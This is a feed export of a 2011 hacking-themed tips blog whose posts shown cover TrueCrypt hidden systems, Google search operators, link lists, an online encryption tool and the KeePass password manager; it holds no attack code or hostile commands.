<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5072739973047119603</id><updated>2024-08-29T05:07:20.963+05:30</updated><category term="Basic Hacking"/><category term="Hacking"/><category term="Hacks"/><category term="Encryption"/><category term="Decryption"/><category term="Botnet"/><category term="Anonymous"/><category term="Live CD"/><category term="Ebooks"/><category term="Notepad Tricks"/><category term="Others"/><category term="Password"/><category term="Phishing"/><category term="Backtrack"/><category term="Blogger"/><category term="Booters"/><category term="Crypter"/><category term="Exploit"/><category term="Google Dorks"/><category term="IPS/IDS"/><category term="Links"/><category term="Metasploit"/><category term="OS"/><category term="Penetration Testing"/><category term="Programming"/><category term="RFI"/><category term="SQL"/><category term="TrueCrypt"/><title type='text'>Computer Tips &amp;amp; Tricks</title><subtitle type='html'>Don`t Learn to HACK - Hack to LEARN</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default?start-index=26&amp;max-results=25'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>37</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-3259454063673429228</id><published>2011-06-11T16:38:00.001+05:30</published><updated>2011-06-11T16:42:57.195+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Decryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Encryption"/><category scheme="http://www.blogger.com/atom/ns#" term="OS"/><category scheme="http://www.blogger.com/atom/ns#" term="TrueCrypt"/><title type='text'>Hidden Operating System</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/uQREbqocnmo?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;
If your system partition or system drive is encrypted using TrueCrypt, you need to enter your pre-boot authentication password in the TrueCrypt Boot Loader screen after you turn on or restart your computer. It may happen that you are forced by somebody to decrypt the operating system or to reveal the pre-boot authentication password. There are many situations where you cannot refuse to do so (for example, due to extortion). TrueCrypt allows you to create a hidden operating system whose existence should be impossible to prove (provided that certain guidelines are followed — see below). Thus, you will not have to decrypt or reveal the password for the hidden operating system.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1lZfT&quot;&gt;TrueCrypt&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/3259454063673429228/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/06/hidden-operating-system.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/3259454063673429228'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/3259454063673429228'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/06/hidden-operating-system.html' title='Hidden Operating System'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-2519893107184768091</id><published>2011-05-26T23:36:00.000+05:30</published><updated>2011-05-26T23:36:09.903+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Google Dorks"/><title type='text'>Google Search Tricks and Tips</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
A large number of people use google to search content which they like.Google is surely leading search engine so it will be good that i share with my readers on how to search more exactly and easily what they want.All i got this by experience and a bit surfing and i will try to sum up all thins here.&lt;br /&gt;
&lt;br /&gt;
1.Find specific URL:&lt;br /&gt;
Inorder to find specific url containing something like /portals/0 or anything like call/index.php. Then we shall use a google dork like&lt;br /&gt;
&lt;blockquote&gt;inurl:&#39;term to search&#39; &amp;nbsp; e-g &amp;nbsp;inurl:&#39;/portals/0&#39; &amp;nbsp;and you will get results in no time.&lt;/blockquote&gt;2.Limit searches to a particular site:&lt;br /&gt;
I use this one all the time, and it’s particularly handy because many site’s built-in search tools don’t return the results you’re looking for (and some sites don’t even have a search feature). If i am looking for movies songs in site songs.pk then i will try:&lt;br /&gt;
&lt;blockquote&gt;movie name site:songs.pk &amp;nbsp; &amp;nbsp;or simple i may say &amp;nbsp; &amp;nbsp; &amp;nbsp;content type site: any.com&lt;/blockquote&gt;3.Use of OR:&lt;br /&gt;
Putiing capital OR in between terms will search both the terms, either that term or the other.&lt;br /&gt;
Like:&lt;br /&gt;
&lt;blockquote&gt;ipod OR mp3 player&lt;/blockquote&gt;4.Use of related:&lt;br /&gt;
Including related: and the &amp;nbsp;URL searches for the results that are somehow related to that URL.like&lt;br /&gt;
&lt;blockquote&gt;related:google.com&lt;/blockquote&gt;5.Use of ~ :&lt;br /&gt;
Putting text a~ infront of a word searches for a word but also for its synonyms. e-g searching for cat~nutrition will give you result of nutrition and food,protein etc, so we can use:&lt;br /&gt;
&lt;blockquote&gt;text~function&lt;/blockquote&gt;6.Use Google as a calculator:&lt;br /&gt;
Google has a built-in calculator — try entering a calculation like 110 * (654/8 + 3). Yes, your computer also has a calculator, but if you spend most of your day inside a browser, typing your calculation into the browser’s search box is quicker than firing up your calculator app.&lt;br /&gt;
&lt;br /&gt;
7.Get quick currency conversions:&lt;br /&gt;
Google can also do currency conversion, for example: 100 pounds in dollars.&lt;br /&gt;
(Note: there are many online sites for doing this in more authentic way.)&lt;br /&gt;
&lt;br /&gt;
8.Search for specific document types:&lt;br /&gt;
Google can search the web for specific types of files using the “filetype:” operator. If you’re looking for PowerPoint files about hackersthirst, for example, you could try:&lt;br /&gt;
&lt;blockquote&gt;hackersthirst filetype:ppt&lt;/blockquote&gt;9.Search within numerical ranges using the .. operator:&lt;br /&gt;
Say, for example, you want to look for information about Olympic events that took place in the 1950′s, you could use this search:&lt;br /&gt;
&lt;blockquote&gt;&amp;nbsp;Olympics 1950..1960&lt;/blockquote&gt;10.Area code lookup:&lt;br /&gt;
Need to know where a phone number is located? Google will let you know where it is, and show you a map of the area, too. For example type this and search:&lt;br /&gt;
&lt;blockquote&gt;415&lt;/blockquote&gt;11.Phone Listing:&lt;br /&gt;
Let’s say someone calls you on your mobile number and you don’t know how it is. &amp;nbsp;If all you have is a phone number, you can look it up on Google using the phonebook feature thats so simple but the number must be in :P.&lt;br /&gt;
Example:&lt;br /&gt;
&lt;blockquote&gt;phonebook:617-555-1212 (note: &amp;nbsp;the provided number does not work – you’ll have to use a real number to get any results).&lt;/blockquote&gt;12.Word Definitions:&lt;br /&gt;
If you need to quickly look up the definition of a word or phrase, simply use the &quot;define:&quot; command.&lt;br /&gt;
&lt;blockquote&gt;Example: define:hacking&lt;/blockquote&gt;So, guys which one is your favourite search type.&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/2519893107184768091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/google-search-tricks-and-tips.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/2519893107184768091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/2519893107184768091'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/google-search-tricks-and-tips.html' title='Google Search Tricks and Tips'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-9102832232455891827</id><published>2011-05-25T12:31:00.002+05:30</published><updated>2011-05-25T12:31:55.184+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Links"/><title type='text'>Useful Links</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL4rTJHgh7aGRcsgFl5B5F26sBu4H_mFpv5ZDK_44GWiXeKE_5dbejVlUUefhmWNbqF4lbMG1aDUGuW5rkP_YRtUijSzM2yuOjQtLupMfqpT5WLRITkRBZfByZa1muDXzeSP7cxqTK62A/s1600/useful-links.gif&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL4rTJHgh7aGRcsgFl5B5F26sBu4H_mFpv5ZDK_44GWiXeKE_5dbejVlUUefhmWNbqF4lbMG1aDUGuW5rkP_YRtUijSzM2yuOjQtLupMfqpT5WLRITkRBZfByZa1muDXzeSP7cxqTK62A/s320/useful-links.gif&quot; style=&quot;cursor: move;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;For Online Virus Scanner...&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NXua&quot;&gt;NoVirus Thanks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NXmY&quot;&gt;Jotti&#39;s Malware Scan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NXmZ&quot;&gt;VirusTotal&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NXma&quot;&gt;Kaspersky&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Hosting for Pictures links are here....&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBA&quot;&gt;Imageshack&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBB&quot;&gt;Photobucket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBC&quot;&gt;Fotopic&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBD&quot;&gt;Tinypic&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Files Hosting use this Links...&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBE&quot;&gt;Easy-share&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBF&quot;&gt;Zshare&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBG&quot;&gt;Megaupload&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBH&quot;&gt;Netload&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBI&quot;&gt;4shared&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBJ&quot;&gt;Rapidshare&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBK&quot;&gt;2shared&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBL&quot;&gt;Multiupload&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBM&quot;&gt;Megaupper&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;For the missing .dll or .ocx files go here...&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBN&quot;&gt;dlldump&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBO&quot;&gt;ocxdump&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBP&quot;&gt;afreeocx&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/1NYBQ&quot;&gt;ascentive&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/9102832232455891827/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/useful-links.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/9102832232455891827'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/9102832232455891827'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/useful-links.html' title='Useful Links'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL4rTJHgh7aGRcsgFl5B5F26sBu4H_mFpv5ZDK_44GWiXeKE_5dbejVlUUefhmWNbqF4lbMG1aDUGuW5rkP_YRtUijSzM2yuOjQtLupMfqpT5WLRITkRBZfByZa1muDXzeSP7cxqTK62A/s72-c/useful-links.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-507403803015232947</id><published>2011-05-25T12:30:00.000+05:30</published><updated>2011-05-25T12:30:03.637+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Decryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Encryption"/><title type='text'>Online Encryption &amp; Decryption</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8-sL3ovwONNG2R1HdoUFvbW_qHaD_HmaNDpFIasU_XYNPQVB5GDAstIjLUPz7BSKEVViaU0xnq7xpOKtqbSMrnOqJthG769_1-V0DWdMtfqKO4BEzVkOlTPsPwfXeUZB8f5iMHP2BVFQ/s1600/910x350.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;153&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8-sL3ovwONNG2R1HdoUFvbW_qHaD_HmaNDpFIasU_XYNPQVB5GDAstIjLUPz7BSKEVViaU0xnq7xpOKtqbSMrnOqJthG769_1-V0DWdMtfqKO4BEzVkOlTPsPwfXeUZB8f5iMHP2BVFQ/s400/910x350.jpg&quot; style=&quot;cursor: move;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;For online encryption and decryption of plain text or password go to&amp;nbsp;&lt;a href=&quot;http://adf.ly/1OCG4&quot;&gt;CRYPO&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;JavaScript / Encrypt or Decrypt source code&lt;/li&gt;
&lt;li&gt;Hide URL Link and email address&lt;/li&gt;
&lt;li&gt;Hash Generator&lt;/li&gt;
&lt;li&gt;One&#39;Pass Generator&lt;/li&gt;
&lt;li&gt;PassPhrase Generator&lt;/li&gt;
&lt;li&gt;Mega-PassPhrase Generator&lt;/li&gt;
&lt;li&gt;ASCII Encode/Decode&lt;/li&gt;
&lt;li&gt;Encrypt online message&lt;/li&gt;
&lt;li&gt;Decrypt online message&lt;/li&gt;
&lt;li&gt;Encrypt or Decrypt message&lt;/li&gt;
&lt;li&gt;Multibit Encryption&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/507403803015232947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/online-encryption-decryption.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/507403803015232947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/507403803015232947'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/online-encryption-decryption.html' title='Online Encryption &amp; Decryption'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8-sL3ovwONNG2R1HdoUFvbW_qHaD_HmaNDpFIasU_XYNPQVB5GDAstIjLUPz7BSKEVViaU0xnq7xpOKtqbSMrnOqJthG769_1-V0DWdMtfqKO4BEzVkOlTPsPwfXeUZB8f5iMHP2BVFQ/s72-c/910x350.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-7066501357816683484</id><published>2011-05-25T12:29:00.002+05:30</published><updated>2011-05-25T12:31:08.366+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Decryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Encryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Password"/><title type='text'>Keep Your Passwords Safe</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;What is KeePass?&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your website&#39;s FTP password, online passwords (like website member account), etc. etc. etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, website, etc. Unimaginable.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;Features&lt;/b&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Strong Security&lt;/li&gt;
&lt;li&gt;Multiple User Keys&lt;/li&gt;
&lt;li&gt;Portable and No Installation Required&lt;/li&gt;
&lt;li&gt;Export To TXT, HTML, XML and CSV Files&lt;/li&gt;
&lt;li&gt;Import From Many File Formats&lt;/li&gt;
&lt;li&gt;Easy Database Transfer&lt;/li&gt;
&lt;li&gt;Support of Password Groups&lt;/li&gt;
&lt;li&gt;Time Fields and Entry Attachments&lt;/li&gt;
&lt;li&gt;Auto-Type, Global Auto-Type Hot Key and Drag&amp;amp;Drop&lt;/li&gt;
&lt;li&gt;Intuitive and Secure Clipboard Handling&lt;/li&gt;
&lt;li&gt;Searching and Sorting&lt;/li&gt;
&lt;li&gt;Multi-Language Support&lt;/li&gt;
&lt;li&gt;Strong Random Password Generator&lt;/li&gt;
&lt;li&gt;Plugin Architecture&lt;/li&gt;
&lt;li&gt;Open Source!&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;For more information, see the&amp;nbsp;&lt;a href=&quot;http://adf.ly/1OvEx&quot;&gt;features&lt;/a&gt;&amp;nbsp;page.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;Is it really free?&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;Yes, KeePass is really free, and more than that: it is open source (OSI certified). You can have a look at its full source and check whether the encryption algorithms are implemented correctly.&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/7066501357816683484/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/what-is-keepass-you-need-to-remember.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7066501357816683484'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7066501357816683484'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/what-is-keepass-you-need-to-remember.html' title='Keep Your Passwords Safe'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-1138928862820730001</id><published>2011-05-25T12:28:00.000+05:30</published><updated>2011-05-25T12:28:01.673+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Notepad Tricks"/><title type='text'>Test Your Anti-Virus</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
